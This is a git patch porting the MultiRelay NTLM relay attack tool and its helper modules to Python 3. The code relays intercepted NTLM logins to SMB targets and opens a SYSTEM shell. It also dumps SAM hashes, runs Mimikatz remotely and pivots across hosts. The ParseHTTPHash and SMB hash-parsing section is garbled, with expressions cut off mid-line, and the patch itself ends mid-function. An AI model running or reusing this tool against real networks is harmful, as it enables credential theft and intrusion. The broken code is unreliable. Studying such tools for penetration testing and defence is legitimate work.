From 65971d14ea21d2575d3bf89bbaca5992c83e5840 Mon Sep 17 00:00:00 2001 From: nbadev2 <46690800+nbadev2@users.noreply.github.com> Date: Wed, 30 Dec 2020 16:25:31 -0500 Subject: [PATCH] Updated MultiRelay and associated files for use with Python3 --- tools/MultiRelay.py | 240 ++++++++--------- tools/MultiRelay/RelayMultiCore.py | 372 +++++++++++++------------- tools/MultiRelay/RelayMultiPackets.py | 12 +- tools/SMBFinger/Finger.py | 52 ++-- 4 files changed, 338 insertions(+), 338 deletions(-) diff --git a/tools/MultiRelay.py b/tools/MultiRelay.py index db4416d..109c396 100755 --- a/tools/MultiRelay.py +++ b/tools/MultiRelay.py @@ -23,17 +23,17 @@ import time import random import subprocess from threading import Thread -from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler +from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler try: from Crypto.Hash import MD5 except ImportError: - print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes." - print "You can install it on debian based os with this command: apt-get install python-crypto" - print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n" + print ("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.") + print ("You can install it on debian based os with this command: apt-get install python-crypto") + print ("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n") try: import readline except: - print "Warning: readline module is not available, you will not be able to use the arrow keys for command history" + print ("Warning: readline module is not available, you will not be able to use the arrow keys for command history") pass from MultiRelay.RelayMultiPackets import * from MultiRelay.RelayMultiCore import * @@ -72,18 +72,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script options, args = parser.parse_args() if options.TARGET is None: - print "\n-t Mandatory option is missing, please provide a target.\n" + print ("\n-t Mandatory option is missing, please provide a target.\n") parser.print_help() exit(-1) if options.UserToRelay is None: - print "\n-u Mandatory option is missing, please provide a username to relay.\n" + print ("\n-u Mandatory option is missing, please provide a username to relay.\n") parser.print_help() exit(-1) if options.ExtraPort is None: options.ExtraPort = 0 if not os.geteuid() == 0: - print color("[!] MultiRelay must be run as root.") + print (color("[!] MultiRelay must be run as root.")) sys.exit(-1) OneCommand = options.OneCommand @@ -98,46 +98,46 @@ Pivoting = [2] def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) + return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) def ShowWelcome(): - print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1) - print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' - print 'Usernames to relay (-u) are case sensitive.' - print 'To kill this script hit CTRL-C.\n' - print color('/*',8,1) - print 'Use this script in combination with Responder.py for best results.' - print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n' - print 'This tool listen on TCP port 80, 3128 and 445.' - print 'For optimal pwnage, launch Responder only with these 2 options:' - print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.' - print 'If you do so, use taskkill (as system) to kill the process.' - print color('*/',8,1) - print color('\nRelaying credentials for these users:',8,1) - print color(UserToRelay,4,1) - print '\n' + print (color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)) + print ('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com') + print ('Usernames to relay (-u) are case sensitive.') + print ('To kill this script hit CTRL-C.\n') + print (color('/*',8,1)) + print ('Use this script in combination with Responder.py for best results.') + print ('Make sure to set SMB and HTTP to OFF in Responder.conf.\n') + print ('This tool listen on TCP port 80, 3128 and 445.') + print ('For optimal pwnage, launch Responder only with these 2 options:') + print ('-rv\nAvoid running a command that will likely prompt for information like net use, etc.') + print ('If you do so, use taskkill (as system) to kill the process.') + print (color('*/',8,1)) + print (color('\nRelaying credentials for these users:',8,1)) + print (color(UserToRelay,4,1)) + print ('\n') ShowWelcome() def ShowHelp(): - print color('Available commands:',8,0) - print color('dump',8,1)+' -> Extract the SAM database and print hashes.' - print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)' - print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)' - print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)' - print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)' - print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\' - print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)' - print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to' - print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)' - print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)' - print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)' - print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)' - print color('help',8,1)+' -> Print this message.' - print color('exit',8,1)+' -> Exit this shell and return in relay mode.' - print ' If you want to quit type exit and then use CTRL-C\n' - print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) + print (color('Available commands:',8,0)) + print (color('dump',8,1)+' -> Extract the SAM database and print hashes.') + print (color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)') + print (color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)') + print (color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)') + print (color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)') + print (color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\') + print (color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)') + print (color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to') + print (color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)') + print (color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)') + print (color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)') + print (color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)') + print (color('help',8,1)+' -> Print this message.') + print (color('exit',8,1)+' -> Exit this shell and return in relay mode.') + print (' If you want to quit type exit and then use CTRL-C\n') + print (color('Any other command than that will be run as SYSTEM on the target.\n',8,1)) Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs = logging @@ -153,7 +153,7 @@ def UploadContent(File): try: RunFinger(Host[0]) except: - print "The host %s seems to be down or port 445 down."%(Host[0]) + print ("The host %s seems to be down or port 445 down."%(Host[0])) sys.exit(1) @@ -190,7 +190,7 @@ def ConnectToTarget(): except: try: sys.exit(1) - print "Cannot connect to target, host down?" + print ("Cannot connect to target, host down?") except: pass @@ -219,45 +219,45 @@ class HTTPProxyRelay(BaseRequestHandler): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: + if NTLM_Auth: #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] + Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": - ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - smbdata = s.recv(2048) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE - if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") - t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) - smbdata = s.recv(2048) #got it here. + if Packet_NTLM == "\x01": + ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. + h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") + n = SMBNegoCairo(Data = SMBNegoCairoData()) + n.calculate() + packet0 = str(h)+str(n) + buffer0 = longueur(packet0)+packet0 + s.send(buffer0) + smbdata = s.recv(2048) + ##Session Setup AndX Request, NTLMSSP_NEGOTIATE + if smbdata[8:10] == "\x72\x00": + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") + t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(buffer1) + smbdata = s.recv(2048) #got it here. ## Send HTTP Proxy - Buffer_Ans = WPAD_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb + Buffer_Ans = WPAD_NTLM_Challenge_Ans() + Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. + self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. data = self.request.recv(8092) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) + if Packet_NTLM == "\x03": + NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) ##Might be anonymous, verify it and if so, send no go to client. if IsSMBAnonymous(NTLM_Auth): Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) data = self.request.recv(8092) else: #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login @@ -270,24 +270,24 @@ class HTTPProxyRelay(BaseRequestHandler): t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." + print ("[+] SMB Session Auth sent.") s.send(buffer1) smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) if RunCmd is None: s.close() - self.request.close() + self.request.close() return None - else: + else: ##Any other type of request, send a 407. Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass class HTTPRelay(BaseRequestHandler): @@ -316,11 +316,11 @@ class HTTPRelay(BaseRequestHandler): NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: + if NTLM_Auth: #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] + Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": + if Packet_NTLM == "\x01": ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") n = SMBNegoCairo(Data = SMBNegoCairoData()) @@ -340,21 +340,21 @@ class HTTPRelay(BaseRequestHandler): smbdata = s.recv(2048) #got it here. ## Send HTTP Response. - Buffer_Ans = IIS_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb + Buffer_Ans = IIS_NTLM_Challenge_Ans() + Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. + self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. data = self.request.recv(8092) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) + if Packet_NTLM == "\x03": + NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) ##Might be anonymous, verify it and if so, send no go to client. if IsSMBAnonymous(NTLM_Auth): Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) data = self.request.recv(8092) else: #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login @@ -367,25 +367,25 @@ class HTTPRelay(BaseRequestHandler): t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - print "[+] SMB Session Auth sent." + print ("[+] SMB Session Auth sent.") s.send(buffer1) smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) if RunCmd is None: s.close() - self.request.close() + self.request.close() return None - else: + else: ##Any other type of request, send a 401. Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) + self.request.send(str(Response)) except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass class SMBRelay(BaseRequestHandler): @@ -456,11 +456,11 @@ class SMBRelay(BaseRequestHandler): if Pivoting[0] == "1": pass else: - print "[+] SMB Session Auth sent." + print ("[+] SMB Session Auth sent.") s.send(buffer1) smbdata = s.recv(4096) #We're all set, dropping into shell. - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) + RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) #If runcmd is None it's because tree connect was denied for this user. #This will only happen once with that specific user account. #Let's kill that connection so we can force him to reauth with another account. @@ -480,9 +480,9 @@ class SMBRelay(BaseRequestHandler): return None except Exception: - self.request.close() + self.request.close() ##No need to print anything (timeouts, rst, etc) to the user console.. - pass + pass #Interface starts here. @@ -499,20 +499,20 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): # On this block we do some verifications before dropping the user into the shell. if data[8:10] == "\x73\x6d": - print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target." - print "[+] Hashes were saved anyways in Responder/logs/ folder.\n" + print ("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.") + print ("[+] Hashes were saved anyways in Responder/logs/ folder.\n") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") del ShellOpen[:] return False if data[8:10] == "\x73\x8d": - print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n" + print ("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") del ShellOpen[:] return False if data[8:10] == "\x73\x5e": - print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n" + print ("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n") del ShellOpen[:] return False @@ -533,14 +533,14 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): if Pivoting[0] == "1": pass else: - print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n" + print ("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") del ShellOpen[:] return False # This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. if data[8:10] == "\x75\xcc": - print "[+] Tree Connect AndX denied. Bad Network Name returned." + print ("[+] Tree Connect AndX denied. Bad Network Name returned.") del ShellOpen[:] return False @@ -549,7 +549,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): if Pivoting[0] == "1": pass else: - print "[+] Looks good, "+Username+" has admin rights on C$." + print ("[+] Looks good, "+Username+" has admin rights on C$.") head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") t.calculate() @@ -560,12 +560,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): ## Run one command. if data[8:10] == "\x75\x00" and OneCommand != None or Dump: - print "[+] Authenticated." + print ("[+] Authenticated.") if OneCommand != None: - print "[+] Running command: %s"%(OneCommand) + print ("[+] Running command: %s"%(OneCommand)) RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0]) if Dump: - print "[+] Dumping hashes" + print ("[+] Dumping hashes") DumpHashes(data, s, Target[0]) os._exit(1) @@ -574,10 +574,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): if Pivoting[0] == "1": pass else: - print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" + print ("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n") ShowHelp() Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired") - print color('Connected to %s as LocalSystem.'%(Target[0]),2,1) + print (color('Connected to %s as LocalSystem.'%(Target[0]),2,1)) while True: @@ -617,7 +617,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): Help = re.findall('^help', Cmd[0]) if Cmd[0] == "exit": - print "[+] Returning in relay mode." + print ("[+] Returning in relay mode.") del Cmd[:] del ShellOpen[:] return None @@ -647,7 +647,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) del Cmd[:] else: - print File+" does not exist, please specify a valid file." + print (File+" does not exist, please specify a valid file.") del Cmd[:] if Delete: @@ -669,7 +669,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName) del Cmd[:] else: - print RunAsFileName+" does not exist, please specify a valid file." + print (RunAsFileName+" does not exist, please specify a valid file.") del Cmd[:] if LCmd: @@ -685,7 +685,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) del Cmd[:] else: - print MimikatzFilename+" does not exist, please specify a valid file." + print (MimikatzFilename+" does not exist, please specify a valid file.") del Cmd[:] if Mimi32: @@ -697,12 +697,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) del Cmd[:] else: - print Mimikatzx86Filename+" does not exist, please specify a valid file." + print (Mimikatzx86Filename+" does not exist, please specify a valid file.") del Cmd[:] if Pivot: if Pivot[0] == Target[0]: - print "[Pivot Verification Failed]: You're already on this host. No need to pivot." + print ("[Pivot Verification Failed]: You're already on this host. No need to pivot.") del Pivot[:] del Cmd[:] else: @@ -718,7 +718,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName) if Status == True: - print "[+] Pivoting to %s."%(Pivot[0]) + print ("[+] Pivoting to %s."%(Pivot[0])) if os.path.isfile(RunAsFileName): FileSize, FileContent = UploadContent(RunAsFileName) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) @@ -734,11 +734,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): return None if Status == False: - print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host." + print ("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.") del Cmd[:] del Pivot[:] else: - print RunAsFileName+" does not exist, please specify a valid file." + print (RunAsFileName+" does not exist, please specify a valid file.") del Cmd[:] if Scan: @@ -762,11 +762,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain): data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName) del Cmd[:] else: - print SysSVCFileName+" does not exist, please specify a valid file." + print (SysSVCFileName+" does not exist, please specify a valid file.") del Cmd[:] if data is None: - print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n" + print ("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n") if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -789,7 +789,7 @@ def serve_thread_tcp(host, port, handler): server = ThreadingTCPServer((host, port), handler) server.serve_forever() except: - print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1) + print (color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)) def main(): try: diff --git a/tools/MultiRelay/RelayMultiCore.py b/tools/MultiRelay/RelayMultiCore.py index ee2fa86..ccb737b 100644 --- a/tools/MultiRelay/RelayMultiCore.py +++ b/tools/MultiRelay/RelayMultiCore.py @@ -24,7 +24,7 @@ import re import datetime import threading import uuid -from RelayMultiPackets import * +from MultiRelay.RelayMultiPackets import * from odict import OrderedDict from base64 import b64decode, b64encode sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump'))) @@ -57,17 +57,17 @@ class Packet(): # Function used to write captured hashs to a file. def WriteData(outfile, data, user): - if not os.path.isfile(outfile): - with open(outfile,"w") as outf: - outf.write(data + '\n') - return - with open(outfile,"r") as filestr: - if re.search(user.encode('hex'), filestr.read().encode('hex')): - return False - elif re.search(re.escape("$"), user): - return False - with open(outfile,"a") as outf2: - outf2.write(data + '\n') + if not os.path.isfile(outfile): + with open(outfile,"w") as outf: + outf.write(data + '\n') + return + with open(outfile,"r") as filestr: + if re.search(user.encode('hex'), filestr.read().encode('hex')): + return False + elif re.search(re.escape("$"), user): + return False + with open(outfile,"a") as outf2: + outf2.write(data + '\n') #Function used to verify if a previous auth attempt was made. def ReadData(Outfile, Client, User, Domain, Target, cmd): @@ -75,7 +75,7 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd): with open(Logs_Path+"logs/"+Outfile,"r") as filestr: Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure" if re.search(Login.encode('hex'), filestr.read().encode('hex')): - print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User) + print ("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)) return True else: @@ -84,12 +84,12 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd): raise def ServeOPTIONS(data): - WebDav= re.search('OPTIONS', data) - if WebDav: - Buffer = WEBDAV_Options_Answer() - return str(Buffer) + WebDav= re.search('OPTIONS', data) + if WebDav: + Buffer = WEBDAV_Options_Answer() + return str(Buffer) - return False + return False def IsSMBAnonymous(data): SSPIStart = data.find('NTLMSSP') @@ -101,168 +101,168 @@ def IsSMBAnonymous(data): return False def ParseHTTPHash(data, key, client, UserToRelay, Host, Pivoting): - LMhashLen = struct.unpack(' 24: - DomainLen = struct.unpack(' 24: + DomainLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() - DomainLen = struct.unpack(' 60: + SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() + DomainLen = struct.unpack('60: minutes = Seconds/60 - print 'Fetched in: %.3g minutes.'%(minutes) + print ('Fetched in: %.3g minutes.'%(minutes)) if Seconds<60: - print 'Fetched in: %.3g seconds'%(Seconds) - print "Output:\n", Output + print ('Fetched in: %.3g seconds'%(Seconds)) + print ("Output:\n", Output) return data,s,f ###################################### @@ -643,7 +643,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC Create Service. @@ -660,12 +660,12 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) - #print "[+] Creating service" + #print ("[+] Creating service") ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) ContextHandlerService = data[88:108] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -683,7 +683,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -700,7 +700,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -720,7 +720,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -754,13 +754,13 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -778,7 +778,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ## DCE/RPC SVCCTLControlService, stop operation. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -795,7 +795,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ## DCE/RPC SVCCTLDeleteService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to stop the service.\n" + print ("[+] Failed to stop the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) @@ -811,7 +811,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to delete the service.\n" + print ("[+] Failed to delete the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -846,7 +846,7 @@ def CreateService(Command, 